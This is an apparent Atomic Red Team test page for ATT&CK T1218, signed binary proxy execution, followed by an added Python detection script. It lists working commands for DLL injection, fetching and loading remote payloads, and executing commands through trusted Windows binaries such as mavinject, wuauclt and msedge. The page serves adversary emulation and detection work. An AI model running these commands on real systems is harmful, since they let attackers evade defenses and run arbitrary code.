
T1218 - Signed Binary Proxy Execution

Description from ATT&CK

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.

Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split)

Atomic Tests


Atomic Test #1 - mavinject - Inject DLL into running process

Injects an arbitrary DLL into a running process specified by process ID. Requires Windows 10.

Supported Platforms: Windows

auto_generated_guid: c426dacf-575d-4937-8611-a148a86a5e61

Inputs:

Name | Description | Type | Default Value
process_id | PID of process receiving injection | string | 1000
dll_payload | DLL to inject | path | PathToAtomicsFolder\T1218\src\x64\T1218.dll

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

mavinject.exe #{process_id} /INJECTRUNNING "#{dll_payload}"

Dependencies: Run with powershell!

Description: T1218.dll must exist on disk at specified location (#{dll_payload})
Check Prereq Commands:
if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}"


Atomic Test #2 - Register-CimProvider - Execute evil dll

Executes an arbitrary DLL. Requires at least Windows 8/2012. Note that this DLL can also be served via SMB.

Supported Platforms: Windows

auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655

Inputs:

Name | Description | Type | Default Value
dll_payload | DLL to execute | path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll

Attack Commands: Run with command_prompt!

C:\Windows\SysWow64\Register-CimProvider.exe -Path "#{dll_payload}"

Dependencies: Run with powershell!

Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})
Check Prereq Commands:
if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"


Atomic Test #3 - InfDefaultInstall.exe .inf Execution

Tests execution of a .inf file using InfDefaultInstall.exe.

Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml

Supported Platforms: Windows

auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef

Inputs:

Name | Description | Type | Default Value
inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf

Attack Commands: Run with command_prompt!

InfDefaultInstall.exe "#{inf_to_execute}"

Dependencies: Run with powershell!

Description: INF file must exist on disk at specified location (#{inf_to_execute})
Check Prereq Commands:
if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}"


Atomic Test #4 - ProtocolHandler.exe Downloaded a Suspicious File

Emulates an attack delivered via documents through the protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.

Supported Platforms: Windows

auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2

Inputs:

Name | Description | Type | Default Value
remote_url | url to document | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx

Attack Commands: Run with command_prompt!

FOR /F "tokens=2*" %a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe" /V PATH') do set microsoft_wordpath=%b
call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"

Dependencies: Run with powershell!

Description: Microsoft Word must be installed
Check Prereq Commands:
try {
  $wdApp = New-Object -COMObject "Word.Application"
  Stop-Process -Name "winword"
  exit 0
} catch {
  exit 1
}
Get Prereq Commands:
Write-Host "You will need to install Microsoft Word manually to meet this requirement"


Atomic Test #5 - Microsoft.Workflow.Compiler.exe Payload Execution

Emulates an attack in which Microsoft.Workflow.Compiler.exe runs a .NET assembly that launches calc.exe.

Supported Platforms: Windows

auto_generated_guid: 7cbb0f26-a4c1-4f77-b180-a009aa05637e

Inputs:

Name | Description | Type | Default Value
xml_payload | XML to execute | path | PathToAtomicsFolder\T1218\src\T1218.xml
mwcpath | Default location of Microsoft.Workflow.Compiler.exe | path | C:\Windows\Microsoft.NET\Framework64\v4.0.30319
mwcname | Default name of microsoft.workflow.compiler.exe | path | microsoft.workflow.compiler.exe

Attack Commands: Run with powershell!

#{mwcpath}\#{mwcname} "#{xml_payload}" output.txt

Dependencies: Run with powershell!

Description: .Net must be installed for this test to work correctly.
Check Prereq Commands:
if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1}
Get Prereq Commands:
write-host ".Net must be installed for this test to work correctly."


Atomic Test #6 - Renamed Microsoft.Workflow.Compiler.exe Payload Executions

Emulates an attack in which a renamed copy of Microsoft.Workflow.Compiler.exe runs a .NET assembly that launches calc.exe.

Supported Platforms: Windows

auto_generated_guid: 4cc40fd7-87b8-4b16-b2d7-57534b86b911

Inputs:

Name | Description | Type | Default Value
xml_payload | XML to execute | path | PathToAtomicsFolder\T1218\src\T1218.xml
renamed_binary | renamed Microsoft.Workflow.Compiler | path | PathToAtomicsFolder\..\ExternalPayloads\svchost.exe
mwcpath | Default location of Microsoft.Workflow.Compiler.exe | path | C:\Windows\Microsoft.NET\Framework64\v4.0.30319
mwcname | Default name of microsoft.workflow.compiler.exe | path | microsoft.workflow.compiler.exe

Attack Commands: Run with powershell!

&"#{renamed_binary}" "#{xml_payload}" output.txt

Dependencies: Run with powershell!

Description: .Net must be installed for this test to work correctly.
Check Prereq Commands:
if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force


Atomic Test #7 - Invoke-ATHRemoteFXvGPUDisablementCommand base test

RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).

One of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as "PowerShell module load-order hijacking" where a module containing, in this case, an implementation of the Get-VMRemoteFXPhysicalVideoAdapter is loaded first by way of introducing a temporary module into the first directory listed in the %PSModulePath% environment variable or within a user-specified module directory outside of %PSModulePath%. Upon execution the temporary module is deleted.

Invoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how a PowerShell host executable can be directed to user-supplied PowerShell code without needing to supply anything at the command-line. PowerShell code execution is triggered when supplying the "Disable" argument to RemoteFXvGPUDisablement.exe.

The Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts.

Reference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1

Supported Platforms: Windows

auto_generated_guid: 9ebe7901-7edf-45c0-b5c7-8366300919db

Inputs:

Name | Description | Type | Default Value
module_name | Specifies a temporary module name to use. If -ModuleName is not supplied, a 16-character random temporary module name is used. A PowerShell module can have any name. Because Get-VMRemoteFXPhysicalVideoAdapter abuses module load order, a module name must be specified. | string | foo
module_path | Specifies an alternate, non-default PowerShell module path for RemoteFXvGPUDisablement.exe. If -ModulePath is not specified, the first entry in %PSModulePath% will be used. Typically, this is %USERPROFILE%\Documents\WindowsPowerShell\Modules. | string | $PWD

Attack Commands: Run with powershell!

Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path}

Dependencies: Run with powershell!

Description: The AtomicTestHarnesses module must be installed and Invoke-ATHRemoteFXvGPUDisablementCommand must be exported in the module.
Check Prereq Commands:
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0}
Get Prereq Commands:
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force


Atomic Test #8 - DiskShadow Command Execution

Emulates an attack in which DiskShadow.exe (a LOLBIN installed by default on Windows) is used to execute arbitrary commands.

Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/

Supported Platforms: Windows

auto_generated_guid: 0e1483ba-8f0c-425d-b8c6-42736e058eaa

Inputs:

Name | Description | Type | Default Value
txt_payload | txt to execute | path | PathToAtomicsFolder\T1218\src\T1218.txt
dspath | Default location of DiskShadow.exe | path | C:\Windows\System32\diskshadow.exe

Attack Commands: Run with powershell!

#{dspath} -S #{txt_payload}

Dependencies: Run with powershell!

Description: txt file must exist on disk at specified location (#{txt_payload})
Check Prereq Commands:
if (Test-Path "#{txt_payload}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{txt_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt" -OutFile "#{txt_payload}"
Description: DiskShadow.exe must exist on disk at specified location (#{dspath})
Check Prereq Commands:
if (Test-Path #{dspath}) {exit 0} else {exit 1}
Get Prereq Commands:
echo "DiskShadow.exe not found on disk at expected location"


Atomic Test #9 - Load Arbitrary DLL via Wuauclt (Windows Update Client)

This test uses Wuauclt to load an arbitrary DLL. Upon execution with the default inputs, calculator.exe will be launched. See https://dtm.uk/wuauclt/

Supported Platforms: Windows

auto_generated_guid: 49fbd548-49e9-4bb7-94a6-3769613912b8

Inputs:

Name | Description | Type | Default Value
arbitrary_dll | Path of DLL to be loaded | string | PathToAtomicsFolder\T1218\bin\calc.dll

Attack Commands: Run with command_prompt!

wuauclt.exe /UpdateDeploymentProvider "#{arbitrary_dll}" /RunHandlerComServer

Cleanup Commands:

taskkill /f /im calculator.exe > nul 2>&1

Dependencies: Run with powershell!

Description: DLL to load must exist on disk at specified location (#{arbitrary_dll})
Check Prereq Commands:
if (test-path "#{arbitrary_dll}"){exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{arbitrary_dll}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/bin/calc.dll?raw=true" -OutFile "#{arbitrary_dll}"


Atomic Test #10 - Lolbin Gpscript logon option

Executes logon scripts configured in Group Policy.

References:
https://lolbas-project.github.io/lolbas/Binaries/Gpscript/
https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/

Supported Platforms: Windows

auto_generated_guid: 5bcda9cd-8e85-48fa-861d-b5a85d91d48c

Attack Commands: Run with command_prompt!

Gpscript /logon


Atomic Test #11 - Lolbin Gpscript startup option

Executes startup scripts configured in Group Policy.

References:
https://lolbas-project.github.io/lolbas/Binaries/Gpscript/
https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/

Supported Platforms: Windows

auto_generated_guid: f8da74bb-21b8-4af9-8d84-f2c8e4a220e3

Attack Commands: Run with command_prompt!

Gpscript /startup


Atomic Test #12 - Lolbas ie4uinit.exe use as proxy

Executes commands from a specially prepared ieuinit.inf file.

PoC from: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
Reference: https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/

Supported Platforms: Windows

auto_generated_guid: 13c0804e-615e-43ad-b223-2dfbacd0b0b3

Inputs:

Name | Description | Type | Default Value
Path_inf | Path to the cab file | path | PathToAtomicsFolder\T1218\src\ieuinit.inf
Path_ie4uinit | Path to ie4uinit.exe | path | c:\windows\system32\ie4uinit.exe

Attack Commands: Run with command_prompt!

copy #{Path_ie4uinit} %TEMP%\ie4uinit.exe
copy "#{Path_inf}" %TEMP%\ieuinit.inf
%TEMP%\ie4uinit.exe -BaseSettings

Cleanup Commands:

del %TEMP%\ie4uinit.exe >nul 2>&1
del %TEMP%\ieuinit.inf >nul 2>&1

Dependencies: Run with powershell!

Description: ieuinit.inf must exist on disk at specified location (#{Path_inf})
Check Prereq Commands:
if (Test-Path "#{Path_inf}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{Path_inf}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/ieuinit.inf" -OutFile "#{Path_inf}"


Atomic Test #13 - LOLBAS CustomShellHost to Spawn Process

This test simulates an adversary copying customshellhost.exe and calc.exe from C:\windows\system32\ to C:\temp\, renaming calc.exe to explorer.exe. Upon execution, customshellhost.exe will spawn calc.exe. Note this will only work on Windows 10 or 11.

References: LOLBAS, BishopFox

Supported Platforms: Windows

auto_generated_guid: b1eeb683-90bb-4365-bbc2-2689015782fe

Inputs:

Name | Description | Type | Default Value
dest_path | Directory to copy files into | path | C:\test

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

if (-not (Test-Path #{dest_path})) {
    New-Item -Path #{dest_path} -ItemType Directory
} else {
    Write-Host "Directory #{dest_path} already exists."
}
Copy-Item -Path "C:\windows\system32\customshellhost.exe" -Destination "#{dest_path}\customshellhost.exe" -Force
Copy-Item -Path "C:\windows\system32\calc.exe" -Destination "#{dest_path}\explorer.exe" -Force
#{dest_path}\customshellhost.exe

Cleanup Commands:

Remove-Item -Path #{dest_path} -Recurse -Force


Atomic Test #14 - Provlaunch.exe Executes Arbitrary Command via Registry Key

Provlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command.

Supported Platforms: Windows

auto_generated_guid: ab76e34f-28bf-441f-a39c-8db4835b89cc

Attack Commands: Run with command_prompt!

reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0
reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe
c:\windows\system32\provlaunch.exe LOLBin


Atomic Test #15 - LOLBAS Msedge to Spawn Process

Executes a process under a trusted Microsoft-signed binary, msedge. This test will spawn "calc.exe" as a child process of msedge.exe.

Supported Platforms: Windows

auto_generated_guid: e5eedaed-ad42-4c1e-8783-19529738a349

Attack Commands: Run with powershell!

$edgePath64 = "C:\Program Files\Microsoft\Edge\Application\msedge.exe"
if (Test-Path $edgePath64) {
    $edgePath = $edgePath64
} else {
    # Check 32-bit Edge installation path
    $edgePath32 = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
    if (Test-Path $edgePath32) {
        $edgePath = $edgePath32
    } else {
        exit 1
    }
}
& $edgePath --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\System32\\calc.exe &&"
sleep 5
taskkill -f -im msedge.exe
taskkill -f -im calc.exe
taskkill -f -im win32calc.exe


Atomic Test #16 - System Binary Proxy Execution - Wlrmdr Lolbin

Uses wlrmdr (the Windows Logon Reminder executable) as a proxy binary to evade defensive countermeasures.

Supported Platforms: Windows

auto_generated_guid: 7816c252-b728-4ea6-a683-bd9441ca0b71

Inputs:

Name | Description | Type | Default Value
payload_path | Path to the executable | string | C:\Windows\System32\calc.exe

Attack Commands: Run with powershell!

wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u "#{payload_path}"
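As an added defensive example (not part of this Atomic Red Team page or the project's own code), the following Python triages process-creation events against the command-line shapes exercised by the tests above. It keys on the PE OriginalFileName field rather than the on-disk file name, so the renamed copy of Microsoft.Workflow.Compiler.exe from Test #6 is still recognised, and it flags ie4uinit.exe and customshellhost.exe only when they run from outside the Windows system directories, as Tests #12 and #13 arrange. The event field names follow Sysmon Event ID 1; the sample events, their paths and their OriginalFileName values are constructed for the example and are not real telemetry.

```python
"""Triage constructed Sysmon-style process-creation events for the signed-binary
proxy-execution patterns used by the T1218 atomic tests (added example)."""
import ntpath
import re

# Directories from which the "copied out of place" binaries are expected to run.
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

# (rule name, OriginalFileName, regex over the command line, flag only outside SYSTEM_DIRS)
RULES = [
    ("mavinject-injectrunning", "mavinject.exe", r"/INJECTRUNNING", False),
    ("register-cimprovider-dll", "register-cimprovider.exe", r"-Path\s", False),
    ("infdefaultinstall-inf", "infdefaultinstall.exe", r"\.inf\b", False),
    ("workflow-compiler-payload", "microsoft.workflow.compiler.exe", r"\.xml\b", False),
    ("diskshadow-script", "diskshadow.exe", r"(?:^|\s)[-/]S\s", False),
    ("wuauclt-dll-load", "wuauclt.exe", r"/UpdateDeploymentProvider.+/RunHandlerComServer", False),
    ("gpscript-manual", "gpscript.exe", r"/(?:logon|startup)\b", False),
    ("ie4uinit-out-of-place", "ie4uinit.exe", r"-BaseSettings", True),
    ("customshellhost-out-of-place", "customshellhost.exe", r".*", True),
    ("provlaunch-registry-command", "provlaunch.exe", r"provlaunch\.exe\s+\S+", False),
    ("msedge-gpu-launcher", "msedge.exe", r"--gpu-launcher=", False),
    ("wlrmdr-proxy-exec", "wlrmdr.exe", r"-u\s", False),
]
KNOWN_LOLBINS = {rule[1] for rule in RULES}


def _basename(path):
    return ntpath.basename(path).lower()


def _dirname(path):
    return ntpath.dirname(path).lower().rstrip("\\")


def classify(event):
    """Return the names of all rules an event matches (empty list if benign)."""
    hits = []
    original = event.get("OriginalFileName", "").lower()  # from the PE version resource
    image = event["Image"]
    cmdline = event.get("CommandLine", "")
    for name, orig_name, pattern, only_outside_system in RULES:
        if original != orig_name:
            continue
        if not re.search(pattern, cmdline, re.IGNORECASE):
            continue
        if only_outside_system and _dirname(image) in SYSTEM_DIRS:
            continue  # expected location, leave to baselining
        hits.append(name)
    # A known proxy binary whose on-disk name no longer matches its OriginalFileName
    # (Test #6 copies the workflow compiler to svchost.exe) is suspicious on its own.
    if original in KNOWN_LOLBINS and _basename(image) != original:
        hits.append("renamed-lolbin")
    return hits


def scan(events):
    """Return [(Image, [rule names])] for every event that matched at least one rule."""
    results = []
    for event in events:
        hits = classify(event)
        if hits:
            results.append((event["Image"], hits))
    return results


# Constructed sample events; not real telemetry. OriginalFileName values are assumed.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mavinject.exe", "OriginalFileName": "mavinject.exe",
     "CommandLine": r'mavinject.exe 1000 /INJECTRUNNING "C:\AtomicRedTeam\atomics\T1218\src\x64\T1218.dll"'},
    {"Image": r"C:\Users\alice\ExternalPayloads\svchost.exe",
     "OriginalFileName": "Microsoft.Workflow.Compiler.exe",
     "CommandLine": r'"C:\Users\alice\ExternalPayloads\svchost.exe" "C:\AtomicRedTeam\atomics\T1218\src\T1218.xml" output.txt'},
    {"Image": r"C:\Windows\System32\ie4uinit.exe", "OriginalFileName": "ie4uinit.exe",
     "CommandLine": "ie4uinit.exe -BaseSettings"},  # runs from System32: not flagged
    {"Image": r"C:\Users\alice\AppData\Local\Temp\ie4uinit.exe", "OriginalFileName": "ie4uinit.exe",
     "CommandLine": r"C:\Users\alice\AppData\Local\Temp\ie4uinit.exe -BaseSettings"},
    {"Image": r"C:\Windows\System32\svchost.exe", "OriginalFileName": "svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},  # benign service host
    {"Image": r"C:\Program Files\Microsoft\Edge\Application\msedge.exe", "OriginalFileName": "msedge.exe",
     "CommandLine": r'"C:\Program Files\Microsoft\Edge\Application\msedge.exe" --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\System32\\calc.exe &&"'},
]

if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(hits)}")
```

Matching on OriginalFileName is the design point: a rule keyed on the image name misses the renamed binary outright, whereas the version-resource name survives a copy and rename. The location check for ie4uinit.exe and customshellhost.exe is a first-pass filter, not a verdict; both run legitimately from System32, so that case is left to baselining rather than alerted on.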